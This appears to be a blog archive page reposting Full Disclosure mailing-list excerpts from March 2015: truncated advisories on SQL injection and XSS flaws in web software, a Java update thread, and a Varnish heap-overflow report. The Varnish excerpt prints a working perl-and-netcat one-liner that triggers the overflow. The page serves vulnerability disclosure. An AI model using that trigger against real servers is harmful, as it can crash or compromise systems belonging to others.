Category Archives: Full Disclosure

Full Disclosure

Vastal I-tech phpVID 1.2.3 SQL Injection Security Vulnerabilities

March 10, 2015 007admin

Posted by Jing Wang on Mar 10

*Vastal I-tech phpVID 1.2.3 SQL Injection Security Vulnerabilities*

Exploit Title: Vastal I-tech phpVID /groups.php Multiple Parameters SQL
Injection Security Vulnerabilities
Product: phpVID
Vendor: Vastal I-tech
Vulnerable Versions: 1.2.3 0.9.9
Tested Version: 1.2.3 0.9.9
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL…

Full Disclosure

WordPress Daily Edition Theme v1.6.2 Information Leakage Security Vulnerabilities

March 10, 2015 007admin

Posted by Jing Wang on Mar 10

*WordPress Daily Edition Theme v1.6.2 Information Leakage Security
Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /thumb.php src Parameters
Information Leakage Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type:…

Full Disclosure

WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities

March 10, 2015 007admin

Posted by Jing Wang on Mar 10

*WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security
Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id
Parameters XSS Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type:…

Full Disclosure

SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Security Vulnerabilities

March 10, 2015 007admin

Posted by Jing Wang on Mar 10

*SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Security
Vulnerabilities*

Exploit Title: SuperWebMailer /defaultnewsletter.php” HTMLForm Parameter
XSS Security Vulnerabilities
Product: SuperWebMailer
Vendor: SuperWebMailer
Vulnerable Versions: 5.*.0.* 4.*.0.*
Tested Version: 5.*.0.* 4.*.0.*
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact…

Full Disclosure

Re: Java 8u40 released: why?

March 10, 2015 007admin

Posted by Dave Warren on Mar 10

Unfortunately for Apple and for Mac users in general, Mac users are
going to have to learn that the main security issue on Windows exists in
OSX too: The user. The only real thing that has kept OSX safe from
user-installed malware until now is the relative obscurity of OSX; as
OSX gains enough market share to be worth malware author’s time, we’ll
see more and more malware, ranging from bundleware that replaces user
preference with…

Full Disclosure

Re: Java 8u40 released: why?

March 9, 2015 007admin

Posted by James Hodgkinson on Mar 10

Nick,

Nowhere in the quoted text or my comments did it say it was a forced option, only that it “appeared” in the update;
this thread started with questions as to whether there was any actual changes with the version bump, and I was offering
a possibility.

James

James Hodgkinson wrote:

Indeed!

So you did not notice the explanation that this would happen, right
there on the “continue the install” permission dialog?…

Full Disclosure

Varnish 4.0.3 heap-buffer-overflow while parsing backend server HTTP response.

March 9, 2015 007admin

Posted by Marek Kroemeke on Mar 10

Hi there,

Latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seem to have a problem with parsing HTTP responses from
backend.
The following example response will trigger a heap buffer overflow :

— cut —
perl -e ‘print “HTTP/1.1 200 OKrnContent-Length: dupa” . “n” x 15855 . “A” x 10000 . “n” ‘ | nc -l 1098
— cut —

assuming your config uses localhost:1098 as backend.

meh…

Full Disclosure